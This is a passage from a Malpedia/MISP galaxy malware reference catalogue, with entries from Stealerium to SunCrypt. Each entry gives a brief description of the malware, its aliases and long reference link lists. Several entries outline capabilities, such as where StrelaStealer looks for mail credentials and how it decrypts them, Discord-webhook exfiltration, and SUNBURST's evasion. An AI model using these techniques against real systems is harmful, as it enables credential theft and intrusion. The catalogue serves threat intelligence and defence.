https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q3%20Botnet%20Threat%20Update.pdf

https://github.com/muha2xmad/Python/blob/bdc7a711d5a775f8ae47b591f20fdd2e1360b77b/Stealc/stealc_string_decryption.py

https://glyc3rius.github.io/2023/10/stealc/

https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/

https://www.esentire.com/blog/stealc-delivered-via-deceptive-google-sheets

https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af

Stealerium

According to SecurityScorecard, Stealerium is an open-source stealer available on GitHub. The malware steals information from browsers, cryptocurrency wallets, and applications such as Discord, Pidgin, Outlook, Telegram, Skype, Element, Signal, Tox, Steam, Minecraft, and VPN clients. The binary also gathers data about the infected host, such as the running processes, Desktop and webcam screenshots, Wi-Fi networks, the Windows product key, and the public and private IP address. The stealer employs multiple anti-analysis techniques, such as detecting virtual machines, sandboxes, and malware analysis tools and checking if the process is being debugged. The malware also embedded a keylogger module and a clipper module that replaces cryptocurrency wallet addresses with the threat actor’s addresses if the victim makes a transaction. The stolen information is sent to a Discord channel using a Discord Webhook.

The tag is: misp-galaxy:malpedia="Stealerium"

Stealerium is also known as:

Table 4673. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stealerium

https://resources.securityscorecard.com/research/stealerium-detailed-analysis

https://github.com/Stealerium/Stealerium

Stealer0x3401

According to PTSecurity, this stealer harvests system information which is then RC4 encrypted and Base64 encoded before sending it to the C2 server.

The tag is: misp-galaxy:malpedia="Stealer0x3401"

Stealer0x3401 is also known as:

Table 4674. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stealer_0x3401

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks/

https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/apt31-cloud-attacks

StealthWorker Go

According to Fortinet, StealthWorker is a brute-force malware that has been linked to a compromised e-commerce website with an embedded skimmer that steals personal information and payment details. Before hackers can embed a skimmer, however, the first requirement is for hackers to gain access to their target’s backend. Hacker’s commonly take advantage of vulnerabilities in the Content Management System (CMS) or its plugins to gain entry into the target’s system. Another, simpler option is to use brute force attacks. Though quite slow, this method is still effective against administrators using weak or commonly used passwords.

The tag is: misp-galaxy:malpedia="StealthWorker Go"

StealthWorker Go is also known as:

Table 4675. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stealthworker

https://www.bleepingcomputer.com/news/security/synology-warns-of-malware-infecting-nas-devices-with-ransomware/

https://blog.malwarebytes.com/threat-analysis/2019/02/new-golang-brute-forcer-discovered-amid-rise-e-commerce-attacks/

Stealth Soldier

Check Point Research observed a wave of highly-targeted espionage attacks in Libya that utilize a new custom modular backdoor. Stealth Soldier malware is an undocumented backdoor that primarily operates surveillance functions such as file exfiltration, screen and microphone recording, keystroke logging and stealing browser information.

The tag is: misp-galaxy:malpedia="Stealth Soldier"

Stealth Soldier is also known as:

Table 4676. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stealth_soldier

https://research.checkpoint.com/2023/stealth-soldier-backdoor-used-in-targeted-espionage-attacks-in-north-africa/

SteamHide

Malware written in .NET that hides in Steam profile pictures. Tries to evade virtualization through detection if it is executed within VMWare or VirtualBox.

The tag is: misp-galaxy:malpedia="SteamHide"

SteamHide is also known as:

Table 4677. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.steamhide

https://www.gdatasoftware.com/blog/2021/06/36861-malware-hides-in-steam-profile-images

https://www.gdatasoftware.com/blog/steamhide-malware-in-profile-images

StegoLoader

The tag is: misp-galaxy:malpedia="StegoLoader"

StegoLoader is also known as:

Table 4678. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stegoloader

https://www.secureworks.com/research/stegoloader-a-stealthy-information-stealer

Stinger

The tag is: misp-galaxy:malpedia="Stinger"

Stinger is also known as:

Table 4679. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stinger

STONEBOAT

According to Mandiant, STONEBOAT is an installer for DICELOADER. It is written in .NET and drops its payload in-memory.

The tag is: misp-galaxy:malpedia="STONEBOAT"

STONEBOAT is also known as:

Table 4680. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stoneboat

https://www.mandiant.com/resources/blog/evolution-of-fin7

STOP

STOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file’s name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.

The tag is: misp-galaxy:malpedia="STOP"

STOP is also known as:

  • Djvu

  • KeyPass

Table 4682. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stop

https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware

https://angle.ankura.com/post/102het9/the-stop-ransomware-variant

https://www.team-cymru.com/post/seychelles-seychelles-on-the-c-2-shore

https://www.gdatasoftware.com/blog/2022/01/malware-vaccines

https://www.bleepingcomputer.com/news/security/djvu-ransomware-spreading-new-tro-variant-through-cracks-and-adware-bundles/

https://cybleinc.com/2021/06/21/djvu-malware-of-stop-ransomware-family-back-with-new-variant/

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://www.gdata.de/blog/1970/01/-35391-finger-weg-von-illegalen-software-downloads

https://drive.google.com/file/d/1L8mkylrCJyd-817-45RA6gIFCCX4oaOv/view

https://securelist.com/story-of-the-year-2019-cities-under-ransomware-siege/95456/

https://securelist.com/keypass-ransomware/87412/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf

https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/

https://malienist.medium.com/defendagainst-ransomware-stop-c8cf4116645b

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://cybergeeks.tech/a-detailed-analysis-of-the-stop-djvu-ransomware/

https://intel471.com/blog/privateloader-malware

https://medium.com/csis-techblog/gcleaner-garbage-provider-since-2019-2708e7c87a8a

https://github.com/vithakur/detections/blob/main/STOP-ransomware-djvu/IOC-list

Stormwind

The tag is: misp-galaxy:malpedia="Stormwind"

Stormwind is also known as:

Table 4683. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stormwind

https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/

STOWAWAY

According to Mandiant, STOWAWAY is a publicly available backdoor and proxy. The project supports several types of communication like SSH, socks5. Backdoor component supports upload and download of files, remote shell and basic information gathering.

The tag is: misp-galaxy:malpedia="STOWAWAY"

STOWAWAY is also known as:

Table 4684. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stowaway

https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government

https://github.com/ph4ntonn/Stowaway

https://blog.exatrack.com/melofee/

Stration

The tag is: misp-galaxy:malpedia="Stration"

Stration is also known as:

Table 4685. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stration

STRATOFEAR

The tag is: misp-galaxy:malpedia="STRATOFEAR"

STRATOFEAR is also known as:

Table 4686. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stratofear

https://www.mandiant.com/resources/blog/north-korea-supply-chain

StrelaStealer

According to PCRisk, StrelaStealer seeks to extract email account log-in credentials. At the time of writing, this program targets Microsoft Outlook and Mozilla Thunderbird email clients.

Following successful infiltration, StrelaStealer searches for "logins.json" (account/password) and "key4.db" (password database) within the "%APPDATA%\Thunderbird\Profiles\" directory - by doing so, it can acquire the credentials for Thunderbird.

Alternatively, if Outlook credentials are targeted - StrelaStealer seeks out the Windows Registry from where it can retrieve the program’s key and "IMAP User", "IMAP Server", as well as the "IMAP Password" values. Since the latter is kept in an encrypted form, the malicious program employs the Windows CryptUnprotectData feature to decrypt it prior to exfiltration.

The tag is: misp-galaxy:malpedia="StrelaStealer"

StrelaStealer is also known as:

Table 4687. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.strelastealer

https://medium.com/@DCSO_CyTec/shortandmalicious-strelastealer-aims-for-mail-credentials-a4c3e78c8abc

https://cert-agid.gov.it/news/analisi-tecnica-e-considerazioni-sul-malware-strela/

https://research.openanalysis.net/strelastealer/stealer/2023/05/07/streala.html

StrongPity

According to Mitre, StrongPity is an information stealing malware used by PROMETHIUM.

The tag is: misp-galaxy:malpedia="StrongPity"

StrongPity is also known as:

Table 4691. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity

https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html

https://anchorednarratives.substack.com/p/tracking-strongpity-with-yara

https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf

https://0xthreatintel.medium.com/uncovering-apt-c-41-strongpity-backdoor-e7f9a7a076f4

https://blogs.blackberry.com/en/2021/11/zebra2104

https://mp.weixin.qq.com/s/nQVUkIwkiQTj2pLaNYHeOA

https://securelist.com/blog/research/76147/on-the-strongpity-waterhole-attacks-targeting-italian-and-belgian-encryption-users/

https://www.welivesecurity.com/2017/12/08/strongpity-like-spyware-replaces-finfisher/

https://twitter.com/physicaldrive0/status/786293008278970368

https://blog.minerva-labs.com/a-new-strongpity-variant-hides-behind-notepad-installation

https://ti.qianxin.com/blog/articles/promethium-attack-activity-analysis-disguised-as-Winrar.exe/

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://citizenlab.ca/2018/03/bad-traffic-sandvines-packetlogic-devices-deploy-government-spyware-turkey-syria/

https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html

https://mp.weixin.qq.com/s/5No0TR4ECVPp_Xv4joXEBg

https://anchorednarratives.substack.com/p/recover-your-files-with-strongpity

https://cybleinc.com/2020/12/31/strongpity-apt-extends-global-reach-with-new-infrastructure/

Stuxnet

The tag is: misp-galaxy:malpedia="Stuxnet"

Stuxnet is also known as:

Table 4692. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.stuxnet

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://www.atlanticcouncil.org/wp-content/uploads/2020/07/Breaking-trust-Shades-of-crisis-across-an-insecure-software-supply-chain.pdf

https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf

https://medium.com/s2wlab/w3-may-en-story-of-the-week-code-signing-certificate-on-the-darkweb-94c7ec437001

https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security

https://www.codeproject.com/articles/246545/stuxnet-malware-analysis-paper

https://fmmresearch.files.wordpress.com/2020/09/theemeraldconnectionreport_fmmr-2.pdf

https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf

https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf

https://www.spiegel.de/netzwelt/web/die-erste-cyberwaffe-und-ihre-folgen-a-a0ed08c9-5080-4ac2-8518-ed69347dc147

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf

http://artemonsecurity.blogspot.de/2017/04/stuxnet-drivers-detailed-analysis.html

https://web.archive.org/web/20230416140914if_/http://www.chinaview.cn/20230411/4e0fa0f4fd1d408aaddeef8be63a4757/202304114e0fa0f4fd1d408aaddeef8be63a4757_20230411161526_0531.pdf

https://media.ccc.de/v/27c3-4245-en-adventures_in_analyzing_stuxnet

https://www.welivesecurity.com/media_files/white-papers/Stuxnet_Under_the_Microscope.pdf

https://fmmresearch.wordpress.com/2020/09/28/the-emerald-connection-equationgroup-collaboration-with-stuxnet/

https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf

https://symantec.broadcom.com/hubfs/Attacks-Against-Critical_Infrastructrure.pdf

https://news.yahoo.com/revealed-how-a-secret-dutch-mole-aided-the-us-israeli-stuxnet-cyber-attack-on-iran-160026018.html

SUGARDUMP

According to Mandiant, SUGARDUMP is a credential harvesting utility, capable of password collection from Chromium-based browsers. There are also versions to exfiltrate data via SMTP and HTTP.

The tag is: misp-galaxy:malpedia="SUGARDUMP"

SUGARDUMP is also known as:

Table 4696. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sugardump

https://www.mandiant.com/resources/suspected-iranian-actor-targeting-israeli-shipping

SUGARRUSH

According to Mandiant, SUGARUSH is a backdoor written to establish a connection with an embedded C2 and to execute CMD commands.

The tag is: misp-galaxy:malpedia="SUGARRUSH"

SUGARRUSH is also known as:

Table 4697. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sugarrush

https://www.mandiant.com/resources/suspected-iranian-actor-targeting-israeli-shipping

SUNBURST

FireEye describes SUNBURST as a trojanized SolarWinds digitally-signed component of the Orion software framework that contains a backdoor that communicates via HTTP to third party servers. After an initial dormant period of up to two weeks, it uses a DGA to generate specific subdomains for a set C&C domain. The backdoor retrieves and executes commands, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services. The C2 traffic to the malicious domains is designed to mimic normal SolarWinds API communications: Orion Improvement Program (OIP) protocol. The backdoor uses multiple obfuscated blocklists to identify forensic and anti-virus tools running as processes, services, and drivers. Multiple trojanzied updates were digitally signed from March - May 2020 and posted to the SolarWinds updates website.

The tag is: misp-galaxy:malpedia="SUNBURST"

SUNBURST is also known as:

  • Solorigate

Table 4698. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sunburst

https://twitter.com/cybercdh/status/1338885244246765569

https://twitter.com/KimZetter/status/1338305089597964290

https://www.cadosecurity.com/post/responding-to-solarigate

https://github.com/fireeye/Mandiant-Azure-AD-Investigator

https://blog.reversinglabs.com/blog/sunburst-the-next-level-of-stealth

https://unit42.paloaltonetworks.com/strategically-aged-domain-detection/

https://www.trustedsec.com/blog/solarwinds-backdoor-sunburst-incident-response-playbook/?hss_channel=tw-403811306

https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more

https://www.domaintools.com/resources/blog/unraveling-network-infrastructure-linked-to-the-solarwinds-hack

https://mp.weixin.qq.com/s/UqXC1vovKUu97569LkYm2Q

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a

https://news.sophos.com/en-us/2020/12/14/solarwinds-playbook/

https://twitter.com/0xrb/status/1339199268146442241

https://www.consilium.europa.eu/en/press/press-releases/2021/04/15/declaration-by-the-high-representative-on-behalf-of-the-european-union-expressing-solidarity-with-the-united-states-on-the-impact-of-the-solarwinds-cyber-operation

https://www.cyberark.com/resources/threat-research-blog/golden-saml-revisited-the-solorigate-connection

https://www.mimecast.com/blog/important-security-update/

https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach

https://cert.pl/posts/2023/04/kampania-szpiegowska-apt29/

https://ics-cert.kaspersky.com/reports/2021/01/26/sunburst-industrial-victims/

https://www.bleepingcomputer.com/news/security/the-solarwinds-cyberattack-the-hack-the-victims-and-what-we-know/

https://prevasio.com/static/web/viewer.html?file=/static/Anatomy_Of_SolarWinds_Supply_Chain_Attack.pdf

https://therecord.media/solarwinds-says-fewer-than-100-customers-were-impacted-by-supply-chain-attack

https://pastebin.com/6EDgCKxd

https://labs.sentinelone.com/solarwinds-sunburst-backdoor-inside-the-stealthy-apt-campaign/

https://www.splunk.com/en_us/blog/security/smoothing-the-bumps-of-onboarding-threat-indicators-into-splunk-enterprise-security.html

https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:MSIL/Solorigate.B!dha

https://www.fireeye.com/blog/threat-research/2020/12/sunburst-additional-technical-details.html

https://fidelissecurity.com/threatgeek/data-protection/ongoing-analysis-solarwinds-impact/

https://www.prevasio.io/blog/sunburst-backdoor-a-deeper-look-into-the-solarwinds-supply-chain-malware

https://www.fireeye.com/blog/products-and-services/2021/02/light-in-the-dark-hunting-for-sunburst.html

https://msrc-blog.microsoft.com/2020/12/31/microsoft-internal-solorigate-investigation-update/

https://www.domaintools.com/content/conceptualizing-a-continuum-of-cyber-threat-attribution.pdf

https://www.solarwinds.com/securityadvisory/faq

https://thenewstack.io/behind-the-scenes-of-the-sunburst-attack/

https://netresec.com/?b=211f30f

https://us-cert.cisa.gov/sites/default/files/publications/SolarWinds_and_AD-M365_Compromise-Detecting_APT_Activity_from_Known_TTPs.pdf

https://blog.apiiro.com/detect-and-prevent-the-solarwinds-build-time-code-injection-attack

https://us-cert.cisa.gov/ncas/alerts/aa20-352a

https://www.youtube.com/watch?v=GfbxHy6xnbA

https://corelight.blog/2020/12/15/finding-sunburst-backdoor-with-zeek-logs-and-corelight/

https://netresec.com/?b=211cd21

https://www.youtube.com/watch?v=LA-XE5Jy2kU

https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline

https://www.justice.gov/opa/pr/department-justice-statement-solarwinds-update

https://www.youtube.com/watch?v=mbGN1xqy1jY

https://www.mfa.gov.lv/en/news/latest-news/67813-latvia-s-statement-following-the-announcement-by-the-united-states-of-actions-to-respond-to-the-russian-federation-s-destabilizing-activities

https://www.microsoft.com/en-us/security/business/threat-protection/solorigate-detection-guidance

https://www.cyborgsecurity.com/cyborg_labs/threat-hunt-deep-dives-solarwinds-supply-chain-compromise-solorigate-sunburst-backdoor/

https://netresec.com/?b=212a6ad

https://www.netresec.com/?page=Blog&month=2020-12&post=Reassembling-Victim-Domain-Fragments-from-SUNBURST-DNS

https://github.com/RedDrip7/SunBurst_DGA_Decode

https://vxug.fakedoma.in/samples/Exotic/UNC2452/SolarWinds%20Breach/

https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/

https://github.com/SentineLabs/SolarWinds_Countermeasures

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-unique-dga

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-attacks-stealthy-attackers-attempted-evade-detection

https://github.com/github/codeql/tree/main/csharp/ql/src/experimental/Security%20Features/campaign

https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/

https://github.com/fireeye/sunburst_countermeasures

https://twitter.com/lordx64/status/1338526166051934213

https://www.bleepingcomputer.com/news/security/autodesk-reveals-it-was-targeted-by-russian-solarwinds-hackers/

https://blog.gigamon.com/2021/07/27/ghosts-on-the-wire-expanding-conceptions-of-network-anomalies/

https://techcommunity.microsoft.com/t5/azure-active-directory-identity/azure-ad-workbook-to-help-you-assess-solorigate-risk/ba-p/2010718

https://blog.truesec.com/2021/01/07/avoiding-supply-chain-attacks-similar-to-solarwinds-orions-sunburst

https://notes.netbytesec.com/2021/01/solarwinds-attack-sunbursts-dll.html

https://mp.weixin.qq.com/s/v-ekPFtVNZG1W7vWjcuVug

https://us-cert.cisa.gov/remediating-apt-compromised-networks

https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html

https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

https://www.sans.org/webcasts/contrarian-view-solarwinds-119515

https://www.microsoft.com/security/blog/2021/01/14/increasing-resilience-against-solorigate-and-other-sophisticated-attacks-with-microsoft-defender/

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://twitter.com/cybercdh/status/1338975171093336067

https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/

https://github.com/cisagov/CHIRP

https://www.ironnet.com/blog/a-closer-look-at-the-solarwinds/sunburst-malware-dga-or-dns-tunneling

https://www.nato.int/cps/en/natolive/official_texts_183168.htm?selectedLocale=en

https://netresec.com/?b=2113a6a

https://unit42.paloaltonetworks.com/atoms/solarphoenix/

https://gist.github.com/olafhartong/71ffdd4cab4b6acd5cbcd1a0691ff82f

https://blog.truesec.com/2020/12/17/the-solarwinds-orion-sunburst-supply-chain-attack/

https://www.cyborgsecurity.com/blog/sunburst-solarwinds-supply-chain-attack/

https://www.brighttalk.com/webcast/7451/469525

https://www.bleepingcomputer.com/news/security/nasa-and-the-faa-were-also-breached-by-the-solarwinds-hackers/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds

https://www.gov.pl/web/diplomacy/statement-on-solar-winds-orion-cyberattacks

https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf

https://us-cert.cisa.gov/ncas/alerts/aa21-077a

https://blog.cloudflare.com/solarwinds-orion-compromise-trend-data/

https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/

https://www.mandiant.com/resources/unc2452-merged-into-apt29

https://www.youtube.com/watch?v=-Vsgmw2G4Wo

https://zengo.com/ungilded-secrets-a-new-paradigm-for-key-security/

https://www.domaintools.com/resources/blog/change-in-perspective-on-the-utility-of-sunburst-related-network-indicators#

https://github.com/sophos-cybersecurity/solarwinds-threathunt

https://www.youtube.com/watch?v=cMauHTV-lJg

https://twitter.com/cybercdh/status/1339241246024404994

https://www.splunk.com/en_us/blog/security/sunburst-backdoor-detections-in-splunk.html

https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/

https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html

https://blog.cloudflare.com/a-quirk-in-the-sunburst-dga-algorithm/

https://us-cert.cisa.gov/ncas/alerts/aa21-008a

https://youtu.be/Ta_vatZ24Cs?t=59

https://www.netresec.com/?page=Blog&month=2020-12&post=Extracting-Security-Products-from-SUNBURST-DNS-Beacons

https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/

https://blog.prevasio.com/2020/12/sunburst-backdoor-part-ii-dga-list-of.html

https://go.recordedfuture.com/hubfs/reports/pov-2020-1230.pdf

https://mitre-attack.github.io/attack-navigator/#layerURL=https://raw.githubusercontent.com/center-for-threat-informed-defense/public-resources/master/solorigate/UNC2452.json

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware

https://threatconnect.com/blog/tracking-sunburst-related-activity-with-threatconnect-dashboards

https://www.a12d404.net/ranting/2021/01/17/msbuild-backdoor.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-command-control

https://www.bleepingcomputer.com/news/security/fireeye-microsoft-create-kill-switch-for-solarwinds-backdoor/

https://blogs.microsoft.com/on-the-issues/2020/12/17/cyberattacks-cybersecurity-solarwinds-fireeye/

https://www.youtube.com/watch?v=dV2QTLSecpc

https://www.aon.com/cyber-solutions/aon_cyber_labs/cloudy-with-a-chance-of-persistent-email-access/

https://vrieshd.medium.com/finding-sunburst-victims-and-targets-by-using-passivedns-osint-68f5704a3cdc

https://www.brighttalk.com/webcast/7451/462719

https://www.zscaler.com/blogs/security-research/hitchhikers-guide-solarwinds-incident-response

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a

https://twitter.com/FireEye/status/1339295983583244302

https://community.ibm.com/community/user/security/blogs/gladys-koskas1/2020/12/18/sunburst-indicator-detection-in-qradar

https://www.bleepingcomputer.com/news/security/mimecast-links-security-breach-to-solarwinds-hackers/

https://medium.com/insomniacs/a-look-into-sunbursts-dga-ba4029193947

https://drive.google.com/file/d/1R79Q1oC18GmKK8FYBoYEt0vYF7SpsvQI/view

https://www.cisa.gov/news/2021/01/05/joint-statement-federal-bureau-investigation-fbi-cybersecurity-and-infrastructure

https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610

https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/

https://www.comae.com/posts/sunburst-memory-analysis/

https://www.domaintools.com/resources/blog/continuous-eruption-further-analysis-of-the-solarwinds-supply-incident

https://twitter.com/Intel471Inc/status/1339233255741120513

https://www.trustedsec.com/blog/solarwinds-orion-and-unc2452-summary-and-recommendations/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/how-a-device-to-cloud-architecture-defends-against-the-solarwinds-supply-chain-compromise/

https://www.cisa.gov/supply-chain-compromise

https://blog.prevasio.com/2020/12/sunburst-backdoor-part-iii-dga-security.html

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://www.4hou.com/posts/KzZR

https://twitter.com/ItsReallyNick/status/1338382939835478016

https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate

https://blog.prevasio.com/2020/12/sunburst-backdoor-deeper-look-into.html

https://www.mimecast.com/incident-report/

https://www.fireeye.com/current-threats/sunburst-malware.html

https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware

https://www.mandiant.com/media/10916/download

https://www.solarwinds.com/securityadvisory

https://news.sophos.com/en-us/2020/12/21/how-sunburst-malware-does-defense-evasion/

https://twitter.com/megabeets_/status/1339308801112027138

https://www.domaintools.com/resources/blog/the-devils-in-the-details-sunburst-attribution

https://mp.weixin.qq.com/s/lh7y_KHUxag_-pcFBC7d0Q

https://www.elastic.co/blog/supervised-and-unsupervised-machine-learning-for-dga-detection

https://www.youtube.com/watch?v=JoMwrkijTZ8

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-sunburst-sending-data

https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/

https://community.riskiq.com/article/9a515637

https://www.crowdstrike.com/blog/crowdstrike-launches-free-tool-to-identify-and-help-mitigate-risks-in-azure-active-directory/

https://r136a1.info/2022/06/18/using-dotnetfile-to-get-a-sunburst-timeline-for-intelligence-gathering/

https://www.microsoft.com/security/blog/2021/02/25/microsoft-open-sources-codeql-queries-used-to-hunt-for-solorigate-activity/

https://docs.google.com/spreadsheets/d/1u0_Df5OMsdzZcTkBDiaAtObbIOkMa5xbeXdKk_k0vWs

https://www.sec.gov/ix?doc=/Archives/edgar/data/1739942/000173994221000076/swi-20210507.htm

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/additional-analysis-into-the-sunburst-backdoor/

https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/

https://us-cert.cisa.gov/ncas/current-activity/2020/12/13/active-exploitation-solarwinds-software

https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/

https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html

https://securelist.com/sunburst-backdoor-kazuar/99981/

https://www.securonix.com/web/wp-content/uploads/2020/12/threat_research_solarwinds_sunburst_eclipser_supply_chain.pdf

https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/

https://www.prevasio.io/blog/sunburst-backdoor-part-ii-dga-the-list-of-victims

https://www.ironnet.com/blog/solarwinds/sunburst-behavioral-analytics-and-collective-defense-in-action

https://youtu.be/SW8kVkwDOrc?t=24706

https://techcommunity.microsoft.com/t5/azure-sentinel/solarwinds-post-compromise-hunting-with-azure-sentinel/ba-p/1995095

SunCrypt

According to PCrisk, Suncrypt ransomware prevents victims from accessing files by encryption. It also renames all encrypted files and creates a ransom message. It renames encrypted files by appending a string of random characters as the new extension.

The tag is: misp-galaxy:malpedia="SunCrypt"

SunCrypt is also known as:

Table 4699. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt

https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/

https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound

https://blog.minerva-labs.com/suncrypt-ransomware-gains-new-abilities-in-2022

https://pcsxcetrasupport3.wordpress.com/2021/03/28/suncrypt-powershell-obfuscation-shellcode-and-more-yara/

https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt

https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/

https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion

https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/

https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a

https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf

https://medium.com/@sapphirex00/diving-into-the-sun-suncrypt-a-new-neighbour-in-the-ransomware-mafia-d89010c9df83

https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3

https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/

https://medium.com/s2wlab/case-analysis-of-suncrypt-ransomware-negotiation-and-bitcoin-transaction-43a2194ac0bc

https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-is-still-alive-and-kicking-in-2022/

